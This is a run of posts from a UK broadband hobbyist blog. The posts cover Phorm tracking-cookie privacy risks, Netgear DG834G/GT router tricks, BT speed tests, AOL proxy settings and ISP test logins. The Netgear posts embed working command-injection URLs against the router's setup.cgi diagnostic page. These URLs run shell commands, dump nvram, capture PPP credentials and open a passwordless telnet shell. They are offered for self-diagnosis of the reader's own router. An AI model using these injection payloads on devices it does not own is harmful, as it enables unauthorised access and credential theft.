UID to a webwise cookie in the "Spammer.con" domain, and redirect the client so that it resends the original request.<BR><BR> The spammer's server would then reply with a redirect to a php script with an https: URL in the same domain. eg<BR><BR>"https://Spammer.con/phormbug_YourEmailAddressHere.php"<BR><BR>The email client automatically requests this https: url sending the webwise UID cookie. <BR><BR>Using https: encryption bypasses phorm's intercept of the UID cookie, delivering the UID (cookie) and email address (encoded in the URL) to the spammer.<BR><BR>The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.</DIV> <DIV><BR><BR> The email itself could purport to have been sent by a major retailer and to contain a printable £10 discount voucher, it might prove incentive enough to encourage recipients to view it, but I'm sure spammers could devise even better inducements. <BR><BR>
<BR> Spammers could also capture the webwise UID and associate it with the user's email address by tricking the Phorm user into clicking on a link within the email (which contains the email address it was sent to encoded/obfusticated within the link). This wouldn't be limited to webmail.
<BR><BR>
The Phorm user's browser would attempt to open the page, phorm would intercept it and add its UID cookie to the domain, the spammers website would redirect the request to an https: page, and the phorm user's browser would re-request the https: page, passing the phorm webwise cookie to the site. <BR> <BR> Phorm's selling point to users is anti-phisishing protection, so the users who might benefit from Phorm (if they didn't already have anti-phisihing protection), would be the same users who would be likely to click on the link.
<BR><BR> <UR><BR><A href="http://petitions.pm.gov.uk/ispphorm/" target=_blank><U>Please sign the <FONT color=red>petition against ISPs monitoring your browsing activity for advertising purposes</FONT></U></A><BR></DIV></DIV></DIV> <BR> <HR style="COLOR: #d1d1e1" SIZE=1><br> <STRONG>Using the webwise UID with a third party tracking system?</STRONG> <HR style="COLOR: #d1d1e1" SIZE=1><br> Tracking cookies are used by "data mining" companies to collect data as your visit partner websites. Some people consider them a privacy issue, and programs such as Ad-Aware identify and remove a large number of tracking cookies. <BR> <BR> A leaking webwise UID could be captured by such a tracking system and by doing so, should its own Unique ID cookie be deleted, it could use the webwise UID to re-identify the visitor and restore its original UID cookie. <BR><BR> If a user opts out of webwise and subsequently opts back in, it would be possible for the third party tracking system to associate the new UID to the user's old UID, something webwise claim not to be able to do themselves. <BR><BR> Only by deleting both the tracking cookie and ALL webwise created cookies, including those stored in other domains, would it be possible for a user to ensure that they could not be re-identified by a third party tracking system. <BR><BR> <HR style="COLOR: #d1d1e1" SIZE=1> <br>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-57838091421478839172008-04-15T20:18:00.007+00:002008-04-15T21:07:17.043+00:00Phorm RantWhy I'm happy to use Google, but wouldn't countenance phorm.
<BR><BR>
In response to a post by Alex in www.badphorm.co.uk.
<BR><BR><BR>
Well I know you didn't ask me, but if I might answer anyway.
<BR><BR>
Search engine provide me with a valuable service. Phorm's webwise is a disservice I can do without.<BR><BR>
I can control what information search engines get to see about me, I don't have to use them at all if I don't want to, and so I don't have to be confident that I can trust them, or worry too much if they are secure.
<BR><BR>
I can't avoid all my traffic passing though my ISP's network except by moving ISP, but I trust my ISP primarily because I know it would be ILLEGAL for them to intercept my communications, and also to a lesser extent because I know that the shear bulk of other customer's communications make it highly unlikely that they would intercept mine unless they had a very good reason to want to target me.
<BR><BR>
Now phorm on the other hand, has the potential to intercept all my non-encrypted communications, and I'm expected to trust them and I'm expected to trust a Phorming ISP that has installed equipment designed to be able to analyse all of its customers browsing traffic en-mass, and apparently claims it is no longer bound by the legal requirement not to intercept my communications, because it has supposedly got my permission by using Man-In-The-Middle techniques to check for an opt-out cookie!
<BR><BR>
I'm also expected to trust that the level of detail of the information you collect and the extent to which you share it will never expand, even when advertisers start increasingly demanding more useful data and your competitors offer phorming ISPs superior systems that collect more detailed data that advertisers will pay more to exploit.
<BR><BR>
I'm also expected to trust that your system is secure, and that a hacker could never break in to it and find a way to subvert it into collecting the sort of data hackers are interested in. However small you might claim it is, why the hell would I take the risk!
<BR><BR>
In short, no I would not be comfortable using any ISP that had such a system connected to its network and I'd question the wisdom of anyone that is.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-23748820903307468952008-01-11T00:43:00.001+00:002011-10-15T19:12:17.464+00:00Netgear DG834G <br />
<hr /><div id="dg834"><input id="ipadG" size="15" type="text" value="192.168.0.1" /><input onclick="add2urlG();" type="button" value="change ip" /> <br />
<br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(/sbin/ifconfig+ppp0;/bin/echo+-e+Uptime+%60/bin/cat+/proc/uptime%60+%5C%5CnWan+up+%60/bin/cat+/tmp/wan_uptime%60;/bin/cat+/proc/avalanche/*modem*;/usr/sbin/adslctl+info+--stats;/bin/echo+%22%3C/textarea%3E%3Cscript%3Evar+a=document.getElementsByName(%5C%22ping_result%5C%22);a[0].rows=40;a[0].cols=100;%3C/script%3E%22)%3E%261" rel="nofollow" target="_blank">Detailed Stats</a><br />
<br />
<br />
"Trained Path:" appears to indicate if your connection is interleaved. <br />
<br />
Trained Path: 0 = Fast path. Trained Path: 1 = Interleaved. <a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(/bin/cat+/proc/net/ip_conntrack;/bin/echo+%22%3C/textarea%3E%3Cscript%3Evar+a=document.getElementsByName(%5C%22ping_result%5C%22);a[0].rows=40;a[0].cols=150;%3C/script%3E%22)%3e%261" rel="nofollow" target="_blank">ip_contrack</a> Routing table. <br />
<br />
<br />
<hr /><br />
<br />
<b>To enable telnet access on a Netgear DG834(G) </b> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=debug" rel="nofollow" target="_blank">http://192.168.0.1/setup.cgi?todo=debug</a> - this launches utelnetd -d <br />
<br />
There is no root password so while enabled, everyone on the lan will have telnet access. Disable in the terminal by typing "killall utelnetd" <br />
<br />
<br />
<b>To enable ppp debugging</b> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ppp_debug" rel="nofollow" target="_blank">http://192.168.0.1/setup.cgi?todo=ppp_debug</a> This puts pppd in debug mode and logs the establishment of the connection - LCP traffic to /tmp/ppp_log NB the output includes username and encrypted password. <br />
<br />
<a href="http://192.168.0.1/ppp_log" rel="nofollow" target="_blank">http://192.168.0.1/ppp_log</a> To view ppp_log <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(/bin/rm%20/tmp/ppp_log;)%3E%261+2%3E%261;" rel="nofollow" target="_blank">Delete ppp_log</a> <br />
<br />
<br />
<b>To enable VPN debugging</b> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=vpn_debug" rel="nofollow">http://192.168.0.1/setup.cgi?todo=vpn_debug</a> <br />
<br />
<b>Select between Modem Only Mode (PPPoE bridge) and Router Mode</b> <br />
<br />
<a href="http://192.168.0.1/mode.htm" rel="nofollow" target="_blank">http://192.168.0.1/mode.htm</a> <br />
<br />
<br />
<b>Disable Configuration Assistant</b> <br />
<br />
<a href="http://www.routerlogin.com/CA_HiddenPage.htm" rel="nofollow" target="_blank">http://www.routerlogin.com/CA_HiddenPage.htm</a> use this if you get stuck in the smart wizard (configuration assistant). <br />
<br />
<hr /><br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;/usr/sbin/rc+wan+stop;/usr/sbin/pppd+plugin+pppoa+0.38+user+speedtest@speedtest_domain+password+ignored+nodetach+defaultroute+vc-encaps+usepeerdns+maxfail+0+qos+UBR+lcp-echo-failure+3+lcp-echo-interval+10%3E/dev/null+2%3E/dev/null+%26" rel="nofollow" target="_blank">connect to speedtest@speedtest_domain</a>- to reconnect to you ISP disconnect and reconnect using the <a href="http://192.168.0.1/setup.cgi?next_file=st_poe.htm" rel="nofollow" target="_blank">router interface.</a> <br />
<br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;PATH=$PATH:/bin:/usr/sbin;(ps;echo+%22%3C/textarea%3E%3Cbr%3e%3ctextarea+rows=40%20cols=140%20wrap=off%3E%22;cd+/proc;for+i+in+%60ls+[0-9]*+-d1%60;do+echo+$i+%60/bin/grep+-v+%5C%3e+$i/cmdline%60;done;echo+%22%3C/textarea%3E%3Cscript%3Evar+a=document.getElementsByName(%5C%22ping_result%5C%22);a[0].rows=10;a[0].cols=140;%3C/script%3E%22)%3E%261" rel="nofollow" target="_blank">Show Command lines</a> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(/bin/grep+.+/tmp/nvram;/bin/echo+%22%3C/textarea%3E%3Cscript%3Evar+a=document.getElementsByName(%5C%22ping_result%5C%22);a[0].rows=40;a[0].cols=150;%3C/script%3E%22)%3E%261" rel="nofollow" target="_blank">Show nvram</a> <br />
<br />
<br />
<br />
<br />
This is not particularily useful unless your connection is 100% stable as the Netgear's host file will be reset every time the PPP connection is re-established after a drop. <br />
<br />
Enter IP address <space> hostname (eg. 192.168.0.10 mel.lan)<br />
<br />
<textarea cols="29" id="dns834" language="javascript" name="dns834N" onchange="var s = 'http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;PATH=$PATH:/bin:/usr/sbin;cp+/proc/`cat+/var/run/dnrd.pid`/cmdline+/tmp/me;rc+dnrd+stop;echo+-e+%22$DNRD%22%3E%3E/etc/hosts;`grep+.+/tmp/me`%3E%261+2%3E%261';var a=document.getElementById('dns834').value.replace(/\r?\n/igm,'\\n').replace(/ /gm,'+');document.getElementById('dns834link').href = s.replace(/\$DNRD/,a);" rows="9" style="height: 187px; width: 278px;">192.168.0.</textarea><br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=5979318544872859116&postID=2374882090330746895" id="dns834link" rel="nofollow" target="_blank">Add Entries to DNS Server</a> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;PATH=$PATH:/bin:/usr/sbin;rc+dnrd+restart+%3e%261+2%3e%261;" rel="nofollow" target="_blank">Reset DNS Server</a> <span id="what"></span> <br />
<br />
<br />
<input onclick="add2urlG();" type="button" value="." /> <br />
<br />
</div><script>
function add2urlG(){ var l=location.pathname + '?host='+ document.getElementById('dns834').value.replace(/\r?\n/igm,'/n').replace(/ /gm,'+')+ '&url=' +document.getElementById('ipadG').value; location.href=l; } function url2htmlG(){ var aa=location.search.match(/url=(.*?)(?=%26|&|$)/im); if (aa!=null && aa[1]!=null) { var ip=aa[1]; var r = new RegExp('://[1]92.168.0.1/','gm'); document.getElementById('dg834').innerHTML=document.getElementById('dg834').innerHTML.replace(r,'://'+ip+'/'); document.getElementById('ipadG').value=ip; } var aa=location.search.match(/host=(.*?)(?=%26|&|$)/im);if (aa!=null && aa[1]!=null) {var xx=aa[1]; document.getElementById('dns834').value=xx.replace(/\/n/igm,'\n').replace(/\+|%20/igm,' ') }; } var o=window.onload; window.onload= function(){url2htmlG();o?o():o;}
</script>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-5979318544872859116.post-5668856919464032972007-11-28T10:22:00.002+00:002011-10-15T19:05:10.183+00:00dg834gt<table border="0" cellpadding="1" cellspacing="0" style="border-color: white; border-width: 1; border: solid;"><tbody>
<tr style="height: 117.35pt;"> <td style="background-color: white; border: none; height: 117.35pt; padding: 0px 5pt 0pt 5pt; width: 150pt;" valign="top"><a href="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;ifconfig;adslctl+info+--SNR;adslctl+info+--Hlog;echo+%5C042%5C074/textarea%5C076%5C074br%5C076%5C074textarea+rows=120+cols=140%5C076%5C042;ifconfig+ppp0;echo+Uptime+$(cat+/proc/uptime);echo+Wan+up+$(cat+/tmp/wan_uptime);adslctl+info+--stats;rm+$0;&todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+%3E%261+2%3E%261;" id="stats" rel="nofollow" target="_blank">DG834GT Stats</a> </td> <td style="background-color: white; border-color: white; border-left: solid; border-width: 1; border: none; font-size: 10pt; height: 117.35pt; padding: 0pt 5pt 0pt 5pt; width: 20pt;">SF:<br />
CRC:<br />
ES:<br />
SES:<br />
RS:<br />
LOF:<br />
D:<br />
HEC:<br />
LOS:<br />
UAS:</td> <td style="background-color: white; border-color: white; border-left: solid; border-width: 1; border: none; font-size: 10pt; height: 117.35pt; padding: 0pt 5pt 0pt 5pt; width: 350pt;">Super Frames<br />
Cyclic Redundancy Check<br />
Errored Seconds (Seconds with 1 or more CRC errors)<br />
Severely Errored Seconds <br />
Reed Solomon Forward Error Correction<br />
Loss Of Framing<br />
Interleave depth<br />
ATM Header Error Control<br />
Loss Of Signal<br />
Unavailable Seconds (No Signal)</td> </tr>
</tbody></table><br />
<hr /><hr /><br />
<br />
<div id="dg834gt"><br />
<input id="ipad" size="15" type="text" value="192.168.0.1" /><input onclick="add2url();" type="button" value="change ip" /> <br />
<br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=start.htm&c4_IPAddr=1;PATH=/bin:/sbin:/usr/bin:/usr/sbin;unset+QUERY_STRING;sh+-c+%22utelnetd+-d+-l+/bin/sh+%3e/dev/null+2%3e/dev/null+%22%26" rel="nofollow" target="_blank" target="_blank">Enable telnet</a> <a href="telnet://192.168.0.1/" rel="nofollow">launch telnet</a> to disable type "killall utelnetd" in the console. <br />
<br />
<hr />Override Target Noise Margin <input id="gtsnr" onchange=";document.getElementById('gtsnrb').disabled=isNaN(this.value);" size="3" type="text" value="100" />% <input id="gtsnrb" onclick="window.open('http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;/usr/sbin/adslctl+configure+--snr+XXX%3e%261+2%3e%261'.replace(/XXX/gm,document.getElementById('gtsnr').value));add2url();" type="button" value="adjust Margin & ReSync" /> <span style="font-size: xx-small;"> 86%= 6dB 100%=7dB(default) 114%= 8db...</span> <br />
<hr /><br />
<br />
<h2>Add entries to router's hosts file</h2><br />
This is not particularily useful unless your connection is 100% stable as the Netgear's host file will be reset every time the PPP connection is re-established after a drop. <br />
<br />
Enter IP address <space> hostname (eg. 192.168.0.10 mel.lan)<br />
<br />
<textarea cols="29" id="dnsgtG" language="javascript" name="dnsgtGN" onchange="var s = 'http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;PATH=/bin:/usr/sbin;cp+/proc/`cat+/var/run/dnrd.pid`/cmdline+/tmp/me;rc+dnrd+stop;echo+%22$DNRD%22%3E%3E/etc/hosts;`grep+.+/tmp/me`>%261';var a=document.getElementById('dnsgtG').value.replace(/\r?\n/igm,'\\n').replace(/ /gm,'+');document.getElementById('dnsgtGlink').href = s.replace(/\$DNRD/,a);" rows="9" style="height: 187px; width: 278px;">192.168.0.</textarea><br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=5979318544872859116&postID=566885691946403297" id="dnsgtGlink" rel="nofollow" target="_blank">Add above to DNS Server</a> <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;PATH=$PATH:/bin:/usr/sbin;rc+dnrd+restart+%3e%261+2%3e%261;" rel="nofollow" target="_blank">Reset DNS Server</a> <span id="what"></span> <br />
<br />
<br />
<br />
<b>Router based "speed test"</b><br />
<br />
If you think poor speeds are caused by your PC or wireless link - This will download a file to the router and time the download (if this test fails to work choose a download file with a shorter URL) Results are only a very rough estimate. <br />
<br />
Input the URL of a file to download and its filesize (url must be quite short).<br />
<br />
Please be patient, the page will only open once the file download has completed. <br />
<br />
Download url <input id="stfile" size="60" type="text" val2="largedownload.me 15672228" value="http://static.btopenworld.com/broadband/adhoc_pages/speedtest/files/smalldownload.me" /> Filesize=<input id="stfilesize" type="text" value="5716212" /><select id="bkmg"><option value="128">Bytes</option><option value="0.125">Kilobytes</option><option value="0.0001220703">Megabytes</option></select> <input onclick="testurl='http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;(S=$(cat+/proc/uptime);wget+%FILE%+-O+/dev/null;E=$(cat+/proc/uptime);echo+$((%SIZE%/$((${E%%.*}-${S%%.*}))))+Kbps);rm+$0;&todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26t*};/bin/sh+/tmp/mel)%3e%261'.replace(/%FILE%/,document.getElementById('stfile').value).replace(/%SIZE%/,Math.round(document.getElementById('stfilesize').value/document.getElementById('bkmg').options[bkmg.selectedIndex].value));window.open(testurl);" type="button" value="test" /> <br />
<br />
<br />
<br />
<br />
Alternative test: Downloads and displays the start and end times so that you can calculate the speed more accurately<br />
<br />
Download url <input id="stfile2" size="60" type="text" value="http://static.btopenworld.com/broadband/adhoc_pages/speedtest/files/smalldownload.me" /> <input onclick="var testurl='http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;(S=$(cat+/proc/uptime);wget+%FILE%+-O+/dev/null;E=$(cat+/proc/uptime);echo+end=${E%%+*};echo+start=${S%%+*});rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=1;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26t*};/bin/sh+/tmp/mel)%3e%261'.replace(/%FILE%/,document.getElementById('stfile2').value);window.open(testurl);" type="button" value="test" /> {44668/(end-start) Kbps}<br />
<br />
<input onclick="add2url();" type="button" value="-" /> </div><br />
<script>
function add2url(){ var l=location.pathname + '?host='+ document.getElementById('dnsgtG').value.replace(/\r?\n/igm,'/n').replace(/ /gm,'+')+ '&snr=' + document.getElementById('gtsnr').value+ '&url=' +document.getElementById('ipad').value; location.href=l; } function url2html(){ var a=location.search.match(/url=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var ip=a[1]; var r = new RegExp('://[1]92.168.0.1/','gm'); document.getElementById('dg834gt').innerHTML=document.getElementById('dg834gt').innerHTML.replace(r,'://'+ip+'/'); document.getElementById('ipad').value=ip; } var a=location.search.match(/host=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var x=a[1]; document.getElementById('dnsgtG').value=x.replace(/\/n/igm,'\n').replace(/\+|%20/igm,' ') }; var a=location.search.match(/SNR=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var x=a[1]; document.getElementById('gtsnr').value=x.replace(/\/n/igm,'\n').replace(/\+|%20/igm,' ') }; } window.onload= url2html;
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-59487773618830243392007-04-04T19:26:00.002+00:002011-10-15T19:26:41.351+00:00Slow Speeds? - BT Performance testerBT's performance tester can be found here <a href="http://speedtester.bt.com/">http://speedtester.bt.com/</a> . Note that it will only work on BT IPstream based connections. <br />
<br />
If your throughput is below 400 kbps, you will be directed to perform a second test, which requires temorarily changing the ADSL username in your modem/router to bt_test_user@<i>yourISP</i>. Where "<i>yourISP</i>" is the normal bit after the '@' in your normal adsl login. <br />
<br />
If this test also produces a very poor result you will be asked to reconnect after changing you username on the modem/router to speedtest@speedtest_domain and run test 3. <br />
<br />
Test 3 connects you to BT's network bypassing your ISP, so a poor result here indicates that the problem is not caused by the ISP. It may be a line fault, your own equipment or household telephone wiring or a BT issue such as exchange congestion. <br />
<br />
<br />
A guide to using the BT performance tester is available from here:- <a href="https://www.btwholesale.com/pages/downloads/Community/Broadband_Community/PT_Customer_handbook_v6.pdf">BT Performance tester End User Handbook</a>. <br />
<br />
<br />
If your speeds are poor, but not bad enough to reach test 3 in the normal BT performance tester, it is possible to run the old BT speedtester while connected using the BT login. <br />
<br />
<b>The following trick stopped working when BT discontinued the old fixed rate products, replacing them with capped rate adaptive ones.</b><br />
<br />
This test is only intended for fixed rate connections up to 2mbps, so the results are not as accurate as the proper BT performance test 3.<br />
However it can be a useful test if your ISP blames your equipment or BT for your speed issues and you suspect this is not the case, but can't get as far as test 3 in the performance tester. <br />
<br />
Username: speedtest@speedtest_domain<br />
Password: anything<br />
<br />
<br />
And open the following link in your browser <br />
<br />
<a rel="nofollow" href="http://217.35.209.142:50302/cgi-bin/home.page.pl">http://217.35.209.142:50302/cgi-bin/home.page.pl</a> <br />
<br />
<br />
<br />
If you also have poor ping times on your normal connection and want a rough idea of latency to the BT RAS you connect through run a tracert as below. <br />
<br />
tracert -h 3 217.35.209.142<br />
and you'll see something like <br />
<br />
1 <10 ms <10 ms 1 ms www.routerlogin.com [192.168.0.1]<br />
2 11 ms 11 ms 12 ms esr4.ilford5.broadband.bt.net [217.47.23.143]<br />
3 * * * Request timed out.<br />
<br />
<br />
Note only the RAS also known as ESR (Edge Service router) will respond.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-20383491505604659732007-03-02T01:06:00.001+00:002011-10-15T19:42:40.912+00:00AOL UK<b>Useful Links</b><br />
<a href="https://names.aol.co.uk/names.adp" target="_blank">Manage Screen Names</a><br />
<a href="http://parentalcontrols.aol.co.uk/parconweb2/home/viewMain.do" target="_blank">Parental Controls</a><br />
<a href="http://www.aolsurvey.co.uk/friends/choose.asp" target="_blank">Refer a Friend</a><br />
<a href="http://help.aol.co.uk/conditions-of-service/article/20060802090809990001" target="_blank">Conditions of Service</a><br />
<a href="http://help.aol.co.uk/help_uk/documentLink.do?cmd=displayKC&docType=kc&externalId=uk_814246984" target="_blank">AOL Complaints Policy</a><br />
<a href="http://bbterms.aol.co.uk/bb_tc/aol_broadband_dsl/default/aol_bb_dsl_feb05.htm" target="_blank">Broadband/Router agreement</a><br />
<br />
<br />
<b>Alternative Aol Member Service phone numbers</b><br />
<br />
(Bristol) 0117 919 1100<br />
(Freephone) 0800 279 6771<br />
<b>AOL Proxy settings</b> <br />
Some UK sites block access to non UK IP addresses, if you are allocated a US IP address you can get around this by configuring your browser with the following proxy settings.<br />
<br />
For http: uk.proxy.aol.com port 80<br />
For https: (ssl) uk.proxy.aol.com port 443<br />
<br />
Set local addresses to bypass the proxy and add 192.168.* to the list of exceptions otherwise you won't be able to access your router's web interface while using the proxy.<br />
<br />
<b>PriceIndex</b><br />
You can find out your AOL PriceIndex which was once rumoured to determine whether you connection is throttled, by temporarily configuring your browser to use AOL's proxy uk.proxy.aol.com port 80, then following the instructions below.<br />
<br />
Copy the script below, or if you prefer add this javascript <a href="javascript:(function(){alert('PriceIndex='+document.getElementById('PriceIndex').value)})();" rel="nofollow">AOL PriceIndex</a> to your favourites. Because it contains a javascript, your browser may warn you that the link may not be safe, click yes to ignore that or use the copy and paste method instead.<br />
<br />
<br />
javascript:(function(){alert('PriceIndex='+document.getElementById('PriceIndex').value)})();<br />
<br />
Navigate to http://help.aol.co.uk/live-help/article/20060814072509990002, log-in using your master screen name and select "Broadband" and click continue. Instead of submitting a question, paste the script above in the address bar and hit return, or if you added it to favourites, just click on the bookmark.<br />
<br />
An alertbox will pop up and display the priceindex eg:- 3436/silver.<br />
<br />
<b>Router settings</b><br />
<br />
AOL recommend: PPPoE LLC, with MTU=1450<br />
<br />
However, I prefer to use PPPoA VC-Mux, with MTU=1430 <span style="font-size: 70%;">(MSS=1390 if router has MSS setting)</span><br />
<br />
<br />
VPI:0<br />
VCI: 38<br />
<br />
Username: <i>screenname</i>@aol.com<br />
<br />
<br />
<i>screenname</i> should be a General (18+) aol screen name in lower case with any spaces omitted. <br />
The password must not be longer than 8 characters and consist of letters and numerals only. <br />
<br />
Alternate Username: aolnet/aol.dsl.<i>screenname</i>.10460001001000030001GB6183.0000.prod <br />
<br />
<span style="font-size: 85%;"> This alternate username only works with PPPoE LLC - it is used by AOL software with modems and if used in a router you will have to run AOL's software & log-in to access the internet.</span><br />
<br />
<br />
AOL Test login Username: ISUR_AOLDSL@americaonline.aol.com Password: roughalienUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-76737489253558753122006-02-02T00:21:00.001+00:002011-10-15T19:46:13.859+00:00Tiscali DataStream test log-inTiscali Wholesale provide the following test login for their datastream based services <span style="font-size:85%;">(BT test log-ins, including whatever@speedtest_domain only work on IPstream) </span><br />
<br />
username: testing@dslconnect.co.uk<br />
password: testing<br />
<br />
The test log-in will connect you to Tiscali's network, rather than routing your connection on to your ISP.<br />
Access is restricted to the following pages:-<br />
<br />
http://speedcheck.ispconnect.co.uk Open this page to run a speed test. <br />
<br />
<a href="http://www.dslconnect.co.uk/">http://www.dslconnect.co.uk/</a> this displays a test page (often doesn't open)Unknownnoreply@blogger.com